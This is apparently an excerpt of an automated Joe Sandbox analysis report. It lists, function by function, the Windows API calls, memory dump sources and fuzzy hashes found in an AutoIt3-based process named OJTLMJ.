                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 357397906-0
                                                                                                                • Opcode ID: c99b70e2342093db733de5835870ecf95c4f8577baa8d4fcfced655960489ba5
                                                                                                                • Instruction ID: 6a5162820610e916777d334d11b09337e8b95151461a1ab030a697a8370ac7c9
                                                                                                                • Opcode Fuzzy Hash: c99b70e2342093db733de5835870ecf95c4f8577baa8d4fcfced655960489ba5
                                                                                                                • Instruction Fuzzy Hash: 7A11EFB9D0020EAFDB41DF99D8849EEBBF9FB08210F108166E955E3310E735AA55CF60
                                                                                                                APIs
                                                                                                                • __lock.LIBCMT ref: 00D68768
                                                                                                                  • Part of subcall function 00D68984: __mtinitlocknum.LIBCMT ref: 00D68996
                                                                                                                  • Part of subcall function 00D68984: EnterCriticalSection.KERNEL32(00D60127,?,00D6876D,0000000D), ref: 00D689AF
                                                                                                                • InterlockedIncrement.KERNEL32(DC840F00), ref: 00D68775
                                                                                                                • __lock.LIBCMT ref: 00D68789
                                                                                                                • ___addlocaleref.LIBCMT ref: 00D687A7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                • String ID:
                                                                                                                • API String ID: 1687444384-0
                                                                                                                • Opcode ID: 703e49a343ee55a83da76486c010bc5a0973cc4cfafcc418ecf80f3b6f1f4445
                                                                                                                • Instruction ID: 4f4e8ef5fa05de6d874ef80075084d90c6b28f4598911f1af2d2c3cfc7b14459
                                                                                                                • Opcode Fuzzy Hash: 703e49a343ee55a83da76486c010bc5a0973cc4cfafcc418ecf80f3b6f1f4445
                                                                                                                • Instruction Fuzzy Hash: 01016DB1401B05AFD720EF75D806759B7E0EF44329F208A0EE09A877A0CB70A644DF31
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00D89C7F
                                                                                                                  • Part of subcall function 00D8AD14: _memset.LIBCMT ref: 00D8AD49
                                                                                                                • _memmove.LIBCMT ref: 00D89CA2
                                                                                                                • _memset.LIBCMT ref: 00D89CAF
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00D89CBF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 48991266-0
                                                                                                                • Opcode ID: b0df84d3fbb95d0a4b92c50fc03e4f2834030d3098b7acdfd1be8e8db97c3b22
                                                                                                                • Instruction ID: 60d6c7bc187cde04e9edf4af389316ef151974106cf61f6c11d23129ccf833cf
                                                                                                                • Opcode Fuzzy Hash: b0df84d3fbb95d0a4b92c50fc03e4f2834030d3098b7acdfd1be8e8db97c3b22
                                                                                                                • Instruction Fuzzy Hash: 80F0307A200100ABCF016F54DC85E49BB29EF45321B08C062FE089E217C731A811DBB5
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D5B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00D5B5EB
                                                                                                                  • Part of subcall function 00D5B58B: SelectObject.GDI32(?,00000000), ref: 00D5B5FA
                                                                                                                  • Part of subcall function 00D5B58B: BeginPath.GDI32(?), ref: 00D5B611
                                                                                                                  • Part of subcall function 00D5B58B: SelectObject.GDI32(?,00000000), ref: 00D5B63B
                                                                                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00DAE860
                                                                                                                • LineTo.GDI32(00000000,?,?), ref: 00DAE86D
                                                                                                                • EndPath.GDI32(00000000), ref: 00DAE87D
                                                                                                                • StrokePath.GDI32(00000000), ref: 00DAE88B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                • String ID:
                                                                                                                • API String ID: 1539411459-0
                                                                                                                • Opcode ID: 69f96d12b575dd8e9ef243e987cb3982a2cbaa501edcb9d8ca62a5879a2e170a
                                                                                                                • Instruction ID: eba3cf527a97425b9d98965ffa2b34252c654f2dc2d62e0dc099b0c5c7b838ff
                                                                                                                • Opcode Fuzzy Hash: 69f96d12b575dd8e9ef243e987cb3982a2cbaa501edcb9d8ca62a5879a2e170a
                                                                                                                • Instruction Fuzzy Hash: 51F0BE3200035BBADB161F58AC09FCA3F9AAF06311F048151FE01651E1C3798656DFB5
                                                                                                                APIs
                                                                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00D7D640
                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00D7D653
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00D7D65A
                                                                                                                • AttachThreadInput.USER32(00000000), ref: 00D7D661
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2710830443-0
                                                                                                                • Opcode ID: 4f48ef5c1e3043c706266aa85641e4816789b5af2d7f4c0338f8020e362fcdf5
                                                                                                                • Instruction ID: 54f8785c5c9194882ac9e4cc716d3ef9901c02914fed0b255560225f42c1a69c
                                                                                                                • Opcode Fuzzy Hash: 4f48ef5c1e3043c706266aa85641e4816789b5af2d7f4c0338f8020e362fcdf5
                                                                                                                • Instruction Fuzzy Hash: 0AE0393114132EBADB205BA29C0DFDB7F2EEF117A1F008020B50CC5160DA719580CBB0
                                                                                                                APIs
                                                                                                                • GetCurrentThread.KERNEL32 ref: 00D7BE01
                                                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,00D7B9C9), ref: 00D7BE08
                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00D7B9C9), ref: 00D7BE15
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,00D7B9C9), ref: 00D7BE1C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentOpenProcessThreadToken
                                                                                                                • String ID:
                                                                                                                • API String ID: 3974789173-0
                                                                                                                • Opcode ID: 54e66a86bb2f37c4256377e036e4537c1c05900a92bb7a1a98e42a4aa4cb1304
                                                                                                                • Instruction ID: 75deaac89aa9bc7c39304cea05431522dbf132bde1b50f14e437e6d6e926c0c0
                                                                                                                • Opcode Fuzzy Hash: 54e66a86bb2f37c4256377e036e4537c1c05900a92bb7a1a98e42a4aa4cb1304
                                                                                                                • Instruction Fuzzy Hash: 56E086326413139BD7201FB59C0CFD73BA9EF547A2F048828F645DA150E7388441C771
                                                                                                                APIs
                                                                                                                • GetSysColor.USER32(00000008), ref: 00D5B0C5
                                                                                                                • SetTextColor.GDI32(?,000000FF), ref: 00D5B0CF
                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 00D5B0E4
                                                                                                                • GetStockObject.GDI32(00000005), ref: 00D5B0EC
                                                                                                                • GetWindowDC.USER32(?,00000000), ref: 00DBECFA
                                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 00DBED07
                                                                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 00DBED20
                                                                                                                • GetPixel.GDI32(00000000,00000000,?), ref: 00DBED39
                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 00DBED59
                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00DBED64
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1946975507-0
                                                                                                                • Opcode ID: d03a21c009bfce7f2c9d890ad601c8a5a0b22806da47e04d056c122b870c28f9
                                                                                                                • Instruction ID: e18ca0e3acb1ad5d53bd788bdd90c853e17692f924a6b2b6e4e98bbe20d58cf4
                                                                                                                • Opcode Fuzzy Hash: d03a21c009bfce7f2c9d890ad601c8a5a0b22806da47e04d056c122b870c28f9
                                                                                                                • Instruction Fuzzy Hash: 22E06D31100342EEEF211F74EC09BC83F22AB06336F088226FA6A980E6C3B18540CB31
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2889604237-0
                                                                                                                • Opcode ID: 1379fdb01efada05b8cea21d532b5394c3a4b74f5418c89307cebe67eebc3c12
                                                                                                                • Instruction ID: 8dfb1a51fb26ecec119045196af29cceadce1c56d2c837bdadfd359b54728da1
                                                                                                                • Opcode Fuzzy Hash: 1379fdb01efada05b8cea21d532b5394c3a4b74f5418c89307cebe67eebc3c12
                                                                                                                • Instruction Fuzzy Hash: 7CE01AB1540306EFDB006F708C48A697BA6EB48351F118425FC4AC7350DA7499819B24
                                                                                                                APIs
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00D7C071
                                                                                                                • UnloadUserProfile.USERENV(?,?), ref: 00D7C07D
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00D7C086
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00D7C08E
                                                                                                                  • Part of subcall function 00D7B850: GetProcessHeap.KERNEL32(00000000,?,00D7B574), ref: 00D7B857
                                                                                                                  • Part of subcall function 00D7B850: HeapFree.KERNEL32(00000000), ref: 00D7B85E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 146765662-0
                                                                                                                • Opcode ID: 65fba9faf7f264f25c8c7f75bcc825fdeaa56ce4a9c57cd5f63c43d346398b34
                                                                                                                • Instruction ID: dc4516e1b4fe210c15ba15e96b3763b43ef00f0e37de480258ff4f9d3f9cbf18
                                                                                                                • Opcode Fuzzy Hash: 65fba9faf7f264f25c8c7f75bcc825fdeaa56ce4a9c57cd5f63c43d346398b34
                                                                                                                • Instruction Fuzzy Hash: 28E0BF36104607BBCB012F95DD09C59FB27FF493613148235F625C1670DB326431EB60
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2889604237-0
                                                                                                                • Opcode ID: c83413d7ec8a674e986300d62b6f14caa0b62576497204b45ab8ee498bd2d057
                                                                                                                • Instruction ID: f1ae357585a7ec4dd7961087df1fa223731e97b3cf3f91d5535aa969f80cd547
                                                                                                                • Opcode Fuzzy Hash: c83413d7ec8a674e986300d62b6f14caa0b62576497204b45ab8ee498bd2d057
                                                                                                                • Instruction Fuzzy Hash: 23E04FB1540306EFDB005F70CC48A697BA6EB4C351F118425FD4AC7350DB74A941CB20
                                                                                                                APIs
                                                                                                                • __getptd_noexit.LIBCMT ref: 00D64C3E
                                                                                                                  • Part of subcall function 00D686B5: GetLastError.KERNEL32(?,00D60127,00D688A3,00D64673,?,?,00D60127,?,00D4125D,00000058,?,?), ref: 00D686B7
                                                                                                                  • Part of subcall function 00D686B5: __calloc_crt.LIBCMT ref: 00D686D8
                                                                                                                  • Part of subcall function 00D686B5: GetCurrentThreadId.KERNEL32 ref: 00D68701
                                                                                                                  • Part of subcall function 00D686B5: SetLastError.KERNEL32(00000000,00D60127,00D688A3,00D64673,?,?,00D60127,?,00D4125D,00000058,?,?), ref: 00D68719
                                                                                                                • CloseHandle.KERNEL32(?,?,00D64C1D), ref: 00D64C52
                                                                                                                • __freeptd.LIBCMT ref: 00D64C59
                                                                                                                • ExitThread.KERNEL32 ref: 00D64C61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 408300095-0
                                                                                                                • Opcode ID: b3a4a0c8a4390e0c192e04f47485d1573a9e84e717b6f679bebeba8c2536771d
                                                                                                                • Instruction ID: f7ba27127968c78b922117dd347e33a8b9217573b0fee088e94a4d410c5576ff
                                                                                                                • Opcode Fuzzy Hash: b3a4a0c8a4390e0c192e04f47485d1573a9e84e717b6f679bebeba8c2536771d
                                                                                                                • Instruction Fuzzy Hash: 7AD0A731402B534FC1352760CD0DE0D36519F01B25B0A4314F035452E0CF20482156B2
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID: >$DEFINE
                                                                                                                • API String ID: 4104443479-1664449232
                                                                                                                • Opcode ID: b6b7349c8407d0fe53c60c125daae37a278362ad09da5d7b5a29e781300d9f9f
                                                                                                                • Instruction ID: f217bfa73d4ad2d9901c04ff2ce07eb6ecee3ede0999f67bde3efb716dea0951
                                                                                                                • Opcode Fuzzy Hash: b6b7349c8407d0fe53c60c125daae37a278362ad09da5d7b5a29e781300d9f9f
                                                                                                                • Instruction Fuzzy Hash: A8123875A0020ADFCB28CF58C490ABDBBB1FF59314F29815AE855AB351D730ED81DBA0
                                                                                                                APIs
                                                                                                                • OleSetContainedObject.OLE32(?,00000001), ref: 00D7ECA0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ContainedObject
                                                                                                                • String ID: AutoIt3GUI$Container
                                                                                                                • API String ID: 3565006973-3941886329
                                                                                                                • Opcode ID: 04f096101c8c26a7329bf0b9f4d7de39740d8b00449cc55b0a180d1da78b4254
                                                                                                                • Instruction ID: 051150c39775cbe2a345ae41fa415044fb3580f8a154bd80fd1942422d8a4a3c
                                                                                                                • Opcode Fuzzy Hash: 04f096101c8c26a7329bf0b9f4d7de39740d8b00449cc55b0a180d1da78b4254
                                                                                                                • Instruction Fuzzy Hash: 75911874600701AFDB64DF64C885B66BBA5FF49710B1485ADF94ACB291EBB0E841CB60
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D43BCF: _wcscpy.LIBCMT ref: 00D43BF2
                                                                                                                  • Part of subcall function 00D484A6: __swprintf.LIBCMT ref: 00D484E5
                                                                                                                  • Part of subcall function 00D484A6: __itow.LIBCMT ref: 00D48519
                                                                                                                • __wcsnicmp.LIBCMT ref: 00D8E785
                                                                                                                • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00D8E84E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                • String ID: LPT
                                                                                                                • API String ID: 3222508074-1350329615
                                                                                                                • Opcode ID: 638c245a5cc0599b3efa48b780d40c57dfab098e24d0fa5fa8772743a1b3653f
                                                                                                                • Instruction ID: 5a3f1e8777aecf977d2645026556875238d48344ce1e9703b68eaafa6ca2fbd3
                                                                                                                • Opcode Fuzzy Hash: 638c245a5cc0599b3efa48b780d40c57dfab098e24d0fa5fa8772743a1b3653f
                                                                                                                • Instruction Fuzzy Hash: 57616D75A00215AFCB14EF98C891EAEB7B9EF49310F05406AF546AB290DB70EE44DF70
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(00000000), ref: 00D41B83
                                                                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 00D41B9C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalMemorySleepStatus
                                                                                                                • String ID: @
                                                                                                                • API String ID: 2783356886-2766056989
                                                                                                                • Opcode ID: 1a51e391775f4029fdb3136957d97e9abbd7547079107bced1c1dfddbc8ec0f5
                                                                                                                • Instruction ID: e4b2f45a1e70e8bc9c216e6fe92a412c389ce755ef96cbccd6a95e42f3663359
                                                                                                                • Opcode Fuzzy Hash: 1a51e391775f4029fdb3136957d97e9abbd7547079107bced1c1dfddbc8ec0f5
                                                                                                                • Instruction Fuzzy Hash: 53513571408744ABE720AF14D885BBBBBE8FB99355F41484DF9C8811A1EB71856CCB62
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D4417D: __fread_nolock.LIBCMT ref: 00D4419B
                                                                                                                • _wcscmp.LIBCMT ref: 00D8CF49
                                                                                                                • _wcscmp.LIBCMT ref: 00D8CF5C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
